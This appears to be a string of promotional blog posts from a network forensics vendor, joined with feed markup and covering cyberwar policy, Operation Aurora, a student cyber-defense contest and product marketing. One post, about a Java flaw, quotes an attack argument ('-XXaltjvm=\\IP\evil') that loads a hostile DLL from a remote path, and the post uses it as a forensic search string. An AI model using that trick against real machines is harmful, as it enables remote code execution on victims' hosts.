The term “cyber” is commonly included with land, sea, air, and space when referring to warfare, though debates about threats prevail. The Department of Homeland Security monitors and controls a collection of cyber assets – or the ‘critical infrastructure’– through various cyber controls and systems. According to the Department of Homeland Security, “our society depends upon such ‘infrastructure’ that if it were damaged or destroyed, it would have a significant impact on our ability to function. Think of the nation’s power grid or banking system. The Internet. Water treatment facilities. Nuclear power plants. Transportation. Our food supply chain and agriculture.” However you assess the realities of cyberwar, we must look at the costs—economic, political, and not least of all, social—of abstaining or engaging in it.

Some argue that though cyber crime is rampant, it doesn’t qualify as warfare. Many claim that talk of cyberwar is merely scaremongering so industry can reap financial benefits and government can increase its power.  While individual Internet freedoms are denied, the public is coerced into trading civil liberties and online privacy for the promise of increased security. Substantiating these warnings are programs such as NSA’s recently announced “Perfect Citizen”, a surveillance program intended to protect primarily privately owned critical infrastructure systems.

In contrast, others warn that the public is ignorant of ongoing attacks and underestimates consequences that equate to a looming “electronic Pearl Harbor.” Vivid, traumatizing scenarios are presented, such as that from former Director of National Intelligence and the NSA, Mike McConnell in an Intelligence Squared cyberwar debate on June 8, 2010:

“Let me give you just a way to think about it. The United States economy is $14 trillion a year. Two banks in New York City move $7 trillion a day. On a good day, they do eight trillion. Now think about that. Our economy is $14 trillion. Two banks are moving $7 trillion to $8 trillion a day. There is no gold; they’re not even printed dollar bills. All of those transactions, all those transactions are massive reconciliation and accounting. If those who wish us ill, if someone with a different world view was successful in attacking that information and destroying the data, it could have a devastating impact, not only on the nation, but the globe. And that’s the issue that we’re really debating.”

However you view cyberwar, everyone generally acknowledges that if real war were to erupt, cyber would be a theater, and we are currently not prepared for engagement, either defensively or offensively. In the face of colossal levels of cyber threats and cyber crime, what is appropriate mitigation?  Herein is the crux of the debate: could any amount of government surveillance or militarization of the Internet prevent cyberwar or manage a full attack? Fundamentally, it’s about openness, transparency, anonymity, and privacy; and it’s a question of trust.

Why does the government propose controversial technologies such as identity systems, data collection, and DPI (deep packet inspection)? To spy on their citizens? To stir public discontent?  To squander taxpayer dollars?

Technology arms the hunt for two elusive targets in the cyber domain – “Attribution” and “Situational Awareness” (SA).

Attribution, the accurate identification of an actor or agent, is an elusive beast in cyber space. In the real-world, actions can generally be traced to sources. The Internet, however, provides the perfect environment for virtualization, abstraction, and indirection. IP addresses aren’t trustworthy as traffic can be tunneled through proxy servers and onion routers, either to conceal identities and location, or maliciously implicate other parties. Even if hosts are identified, connection between actor and host isn’t certain, because attackers can use botnets, or simply because we cannot know for certain who was using the keyboard.

Simply put, Situational Awareness (SA) is gaining omniscience of a situation—what’s happening and what’s about to happen. Less evasive than attribution, SA is the more formidable quarry. We pursue it through combinations of DPI and log, netflow, and statistical analysis, identifying events of interest with finite automata, heuristics, and algorithms, but these all rely on signatures, rules, pre-classification, and prediction. So long as we can describe events, we can detect and prevent them, but the moment they escape the realm of the predictable (as the more highly evolved adversarial attacks do) they become invisible.

Since we cannot predict everything, SA must pursue retrospection. Conceding our inability to predict the future, we look to the past and contrast it to the present to gain a more reliable view of the future. Data collection and the persistence of surveillance information are critical to any serious security program, because of the retrospection component.

Though perfect attribution and situational awareness remain lofty goals, we can benefit from the pursuit. The perfect cannot be the enemy of the good, nor should an irrational fear of government deny us improved defenses. We must continue the hunt for these targets. Privacy advocates and those who use the slippery-slope argument about the perils of ceding rights to the government are advised to seriously consider the part in the Constitution’s preamble, “provide for the common defense,” and apply it to the 21^st century. We must accept that in our virtualized, interconnected, malware infested cyber-dependent world, the enemy is among us, and it is government’s charter to defend us.

We are also proud to sponsor the Security Innovation Network (SINET) Executive Track and reception at Black Hat. In addition to exhibiting at the well-known hacker gathering, we will join our good friend and SINET Chairman and Founder Robert Rodriguez who has organized an impressive program to address key issues we face in cyber security. He will be interviewing General Michael Hayden, one of the nation’s most respected leaders in Washington, DC. This conversation between industry and academia will explore how and where the research community can assist corporations with its most pressing cyber security challenges. Robert has also pulled together an impressive panel and speakers for this track, including:

Steve Elefant, CIO, Heartland
Melissa Hathaway, Harvard University, former Sr. Director Cyberspace- National Security Council
General Michael Hayden, former director of the NSA and CIA
Dr. Doug Maughan, Program Manager, Department of Homeland Security, Science & Technology Cyber Security Research & Development Program
Dr. John Mitchell, Professor, Stanford University, Computer Science Department

Come join Solera Networks in the Pompeian Ballroom at Caesar’s Palace from 14:45 to 16:00 for the SINET reception and to meet Robert Rodriquez from SINET, Peter Schlampp, Solera Networks VP of Marketing and Product Management, and Joe Levy, Solera Networks CTO. At the reception, you can also enter to win an Apple iPad. It will be a great event. See you there!

There’s been an out of cycle patch released to address this issue, but as we all know this doesn’t necessarily mean you’re safe. If hosts in your constituency have already been exposed to attacks using this vector or if they’re not patched yet, there could be a problem out there waiting for you. If you’re using network forensics in your environment, tracking this down and being proactive is pretty straightforward.

One of the more egregious ways to exploit this vulnerability is by using the unpublished command line extension ‘-XXaltjvm’ to allow loading an alternate JVM from an arbitrary (and remote!) UNC path. As Rubén Santamarta put it: “Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP…”

Here’s an example of how to walk though some network forensics data to see if you’ve already had some of this activity on your network.

Using DeepSee, search your captured data for any artifacts containing the string ‘-XXaltjvm’.
Here’s a search of the last 24 Hours of network traffic:

There’s one host here that has served up several suspicious URLs matching our query. You could now take the IPs from the query result and hand them off to an incident response team. But to be absolutely sure your not sending them on a wild goose chase, lets dig a little deeper to verify there’s something worth investigating. Lets revise the search, find any binaries sent to the victim, check to see if they’re malicious and reconstruct an entire attack.

Here is the revised the search, focused solely on traffic sent between the suspect attack host and the victim:

Here we see that there is indeed an alternate jvm.dll being passed to the host, as well as another binary. This secondary binary is most likely shellcode being inserted via a dll injection.

Let’s download these from the results and submit them to Anubis. Then we’ll see if there’s any thing here we should be worried about.

$ ./submit_to_anubis.py –ssl artifact1.bin

$ ./submit_to_anubis.py –ssl artifact2.dll

Both of these look to be malicious. We’ll go ahead and identify everyone that has downloaded this malware and hand it off to our CSIRT team to resolve.

There, that was easy. Now we’ve identified everyone involved and saved the CSIRT a ton of time and effort trying to find it all by hand.

A conversation between James HIlliard, host of the See Everything, Know Everything podcast, and Matthew Wood, Solera Networks’ Chief Scientist.

“The Solera REST API makes integration with those other tools very, very simple. In fact, we’ve integrated with many existing popular tools that are available in the forensics ecosystem and network security ecosystem. For example, we’ve got integration with ArcSight, Palo Alto Networks, SonicWall and SourceFire.”

Location: SAIC offices in Columbia, MD

Dates: 3/11-3/13

Crowded in a conference center at security-conscious SAIC offices (they shut down my rogue Verizon MiFi on day one…I swear I didn’t know they restricted those), five teams gathered to do battle and defend their networks from the onslaught of professional hackers/pen testers. In addition to the glory and bragging rights, the winning team will head to the national competition in San Antonio in April. This regional event was coordinated by Casey O’Brien, director of CyberWatch center at Community College of Baltimore County and Tim Rosenberg, President of White Wolf Security.

The Red Cell (Hackers) was led by none other than recognized pen tester, Paul Asadoorian of PaulDotCom.

The five Blue Cell (Students) teams represented at the event were:

AB Technical College
Community College of Baltimore
Millersville University
Towson University
UMBC

Ok, maybe you haven’t heard of these fine institutions, but you probably will in the future. They deserve to be here considering that they beat out teams from George Mason U., George Washington U., James Madison U., University of MD, and University of Pittsburg in the round leading to this event. Goes to show that in a growing industry around cyber security, big universities don’t necessarily have a lock on the key talent, nor do they offer the right curriculum.

After initial setup by each team and a job/vendor fair Thursday evening, the event officially kicked off on Friday. The Red Cell hammered hard with your expected attacks, but also laid the groundwork for some “after-hours” attacks. Paul and his team hacked the badge reader system that was set up for the event. That made for some evening fun of hiding cables for direct access to routers and direct access to all of the team’s machines and a wake up call for the Blue teams the next morning.

After an evening break to dig into stacks of pizza boxes and IT-powering caffeinated beverages, the teams heard from a couple of guest speakers – Marcus Ranum (Firewall innovator), and Paul Turczynski, Chief Engineer for Intelligence and Security Systems (I&SS) at Boeing, a Division within the Network and Space Systems business unit. Back to battling after that.

The team from UMBC soon realized that their network wasn’t quit the same as they left it before the break…but didn’t know what had been done. Having received a quick 15-minute preview earlier in the day of the Solera DS 3150 we provided for the event, the team decided to take a crack at network forensics to uncover what the Red team had been up to. Using DeepSee Sonar, they narrowed down the captured traffic to that specific hour of activity that targeted their IP address. They then quickly dropped that PCAP into DeepSee Search to uncover the actual artifacts. After a quick browse of the results…Bingo!

Their DeepSee Search uncovered a phone home script (this is the mechanism that a Red Cell player users to contact the White Cell scoring engine to say “I’m in…”) that was an artifact. In fact, working backwards, they then found the delivery of the script as well. Armed with screen shots of the DeepSee GUI and a printout of the actual script (from the artifact) an Incident Report (Secret Service Network Incident Report) was filled with the White Cell. Because of the evidence presented, this was the ONLY Network Incident Report accepted (on day 1 – out of probably 10) and Team 5 received half of the attackers points back (250 points). In addition, the Red Cell attacker was arrested (kicked off the network and forced to find a new home – effectively shut down on his current network) and put out of business until a new network could be found. Victory for the good guys. More to follow…

It took another 166 years for the Mr. Coffee® brand to invent the first automatic drip coffeemaker and its disposable filter that provided convenience, affordability and a reason for every household to stock up on Folgers.

That was a year after the first Starbucks coffeehouse opened its doors in 1971.

And the rest is history. Starbucks is now on every corner and it is hard to imagine a world without a triple grande sugar free vanilla latte.

The revolution can be seen just as clearly when we look at the world of PCs. But, not many industries have changed as quickly or dramatically. Just look at the past 20 years—computers used to take up an enormous amount of space. But, today netbooks and Apples new iPad are smaller than a spiral-bound notebook. What will the next 20 years bring? The race for faster, smaller computers with unthinkable amounts of memory will definitely continue with fierce competition targeting organizations and consumers alike.

One way computers have changed dramatically is … speed. The “father of supercomputing” Seymour Cray created a supercomputer in 1964 that performed up to three million instructions per second, a processing speed that was three times faster than that of its closest competitor, IBM.

By today’s standards, that is an extremely slow computer network. So, as phones get smarter, computer networks get faster and companies stretch beyond borders, what does it mean for network security?

To keep up with the vast amount of data and information on a company’s network, many IT departments are working to upgrade their 1G networks to 10G and beyond. Today, security professionals are challenged to keep pace with the increasing speed of their networks, especially when it comes to finding the source of an attack when such vast amounts of data are crossing the network at such speeds. The ability to capture, index and store all of the traffic on a full 10G network is extremely important for companies who have moved beyond just trying to prevent a security breach.

Yet, most organizations don’t realize that they can indeed capture, record, index, search, and retrieve any network data at ultra-fast 10Gb network speeds. They still feel restricted by slow technologies that take hours, days, even weeks to retrieve recorded data. The result? Many have given up and consigned themselves to just looking at metadata and hoping they’re protected by their signature-based security tools. They are not recording their network traffic 24/7/365 because they still think it is an impossible task. So when attacks like “Operation Aurora” occur, they have little knowledge of whether their network has been a target, and the extent of the attack.

It is time for organizations to realize that network forensics solutions have been revolutionized to keep up with the speed of today’s networks. It is not a vision of the future—It is here and now.

The Solera DS Appliance captures a company’s comprehensive stream of network traffic, full packet header and payload, indexes those packets into easy-to-search and access flows for replay and artifact reconstruction. So what’s the advantage of speed? Well, you can only analyze and uncover what you have recorded. If you didn’t record it, you don’t have the evidence. Active network forensics that can accommodate today’s network speeds enables real-time analysis without any network impact. It is vital to simply replay a suspected security incident within seconds or minutes, not days or weeks, to quickly identify the source and scope of the attack. To our customers, speed matters. Speeds that today seem beyond comprehension to some will be the norm of the future—and it will be here faster than you think.

So, what’s the best part of waking up? It’s not Folgers, It’s knowing that when your company is the target of an attack, you will be able to swiftly identify and remediate the breach, and protect the organization from further exposure – all prior to your morning coffee break.

The attacks, known now as “Operation Aurora” took advantage of a Microsoft Internet Explorer vulnerability. Today, Microsoft announced a patch for this particular vulnerability.

What does this latest attack tell us? Quite simply, you cannot fight a global cyber war without sufficient weaponry. Would we expect our military to enter into Iraq with just knives? Absolutely not. Similarly, we cannot expect our flagship brands in American enterprises and our government to face cyberwar without the proper tools and ability to respond.

What happened to Google, Adobe and others can never be completely prevented, but the extent of the attack could have been minimized. With active network forensics solutions in place at appropriate points in the network, these organizations could have instantly investigated all the network traffic and swiftly identified suspicious activity at the first sign of an attack. This recorded data could have been replayed to determine the exact scope and extent of the attack, including compromised systems and data. This record could have also proved what systems were not compromised, allowing these organizations to effectively remediate and protect against further exposure. With active network forensics, network traffic and information could have been retrieved in seconds, reducing the exposure window from weeks to hours.

Today, the update code for the patch is available, but what if something got in while the door was open? You may have closed it with a patch, but what about the time between exposure and patching?

It is unwise for organizations today to rely on prevention tools alone and assume they are prepared for an attack. Being able to record your traffic, review attack information and immediately respond to an enemy is an absolute must. Today, every CSO and security administrator must realize that without measures to instantly remediate an attack, they are in jeopardy. Operation Aurora has taught us a very necessary lesson indeed. After all, who brings a knife to a gunfight?

A conversation between James HIlliard, host of the See Everything, Know Everything podcast, and Matthew Wood, Solera Networks’ Chief Scientist.

“DeepSee is a tool that provides administrators, users and even C-level people at a corporation a way to see what happened on a network as it is happening or in the past without needing to know what a packet is or what a MAC address is or how IP addresses work.”

In 2010, we will undoubtedly face new threats. The question is, will security professionals (look in the mirror) change their myopic focus on prevention and apply some serious attention to preparing for the unexpected threat? We need to address all three pillars of an effective security strategy: prevention, detection and incident response.

To security professionals who have prescribed to a “prevention is good enough” belief, preparedness might seem like an impossible task. But, how can we anticipate each and every threat that is out there? To help with a New Year’s resolution to be better prepared in 2010, I’d like to highlight a few steps to move toward a more holistic approach to security:

1. Be prepared. It’s not all about prevention. As security professionals, we can’t focus completely on prevention, because we can only stop what we know. The “unknown unknowns” will continue to roam in the wild and until they are identified and classified, any amount of prevention is insufficient. These threats will be targeting vulnerabilities we are not aware of. Just look at the vast number of recent security incidents, including T-Mobile, Heartland Payment Systems, TJX Companies, MasterCard, American Express and many others. Eventually, vulnerabilities will be found and exploited and a breach will occur. We need to take steps to prepare for the “unknown unknowns” by planning for swift, intelligent response. Incident Response needs to evolve into Instant Response.

   Furthermore, we can’t put all our trust in vendors who convince us that they can stop every security incident. Simply put, it cannot be done. If you put all of your security dollars toward prevention, will you be successful? No. Come to grips with the fact that vulnerabilities exist and be prepared for the incident when it occurs.

2. Don’t rely on compliance alone. Compliance is a start, but regulations are really there just to provide a framework—and force adherence to—good security practices. These are practices that serious security professionals are already following. For those of us that believe that we will not be hacked because we are complaint with industry standards, think again. It can and does happen.

   The Heartland breach is a great example and it has taught us that compliance alone is not enough to stop a major security breach. While Heartland was compliant with the requirements of the Payment Card Industry Data Security Standard (PCI DSS), the company still experienced the biggest breach ever involving payment card data. There are simply no guarantees when motivated attackers have an eye for your assets.

   Rigorous updating and patching, along with practicing general security hygiene is of course wise; however, still not sufficient. For those deploying new technologies touted as the ultimate barrier against a security breach, proceed with caution. Eventually, someone will figure out how to hack into the new technology and you won’t have any improved capability to respond to the previously unknown threat.

3. Investigate, detect, and fortify. Lastly, we must understand that securing our networks and data also includes swift detection of the source and scope of any security incident. This is critical to enable quick and intelligent response. Rapid detection of a breach is arguably more important than just trying to prevent one. This holistic perspective helps you know exactly what is going on within your networks. Then, when something questionable happens, swift response to mitigate the incident provides more protection to your organization’s bottom line and brand equity than with prevention alone.
]]> http://www.soleranetworks.com/blog/a-more-holistic-approach-to-security/feed/ 0 http://www.soleranetworks.com/blog/cyber-security-czar-returns-to-take-his-place-at-the-white-house/ http://www.soleranetworks.com/blog/cyber-security-czar-returns-to-take-his-place-at-the-white-house/#comments Tue, 22 Dec 2009 23:40:12 +0000 Alan Hall, Director of Marketing http://www.soleranetworks.com/blog/?p=451 After much anticipation, the role of cyber security czar has been filled by none other than Howard Schmidt. Schmidt returns to service after previously being in the cyber security czar role for the Bush administration. This return to service demonstrates a change to the originally proposed position of cyber security director. Schmidt will have regular access to President Obama.

Many people have turned down the offer to become our next federal cyber security director. The biggest compliant – not enough power to create real change. But today, we are hopeful. Since Schmidt has had this position before, he fully understands the challenges and most importantly, he understands the politics of government. He also served in the CSO role in the private sector including holding this position at Microsoft. Combined with his experience in forensics and computer crime, he will provide broad experience to this role. We hope this will provide unique understanding and shape his view of the challenges in related to cyber security. He will need added courage to make some significant changes that will have an impact on the industry by taking a more realistic and effective approach to security.

Our suggestion: Stop focusing all attention and resources on known threats and acknowledge susceptibility to security loopholes, or unknown threats, that facilitate failure. We hope Schmidt moves the industry to look at cyber security in a broader context and begin to see that preparedness is not only important, it’s fundamental in addressing our objective of comprehensive security.

We are hopeful that indeed we will see change in the industry based on President Obama’s appointment of Schmidt. We also offer our full support to ensure that government agencies and enterprise alike are embracing preparedness.

]]> http://www.soleranetworks.com/blog/cyber-security-czar-returns-to-take-his-place-at-the-white-house/feed/ 0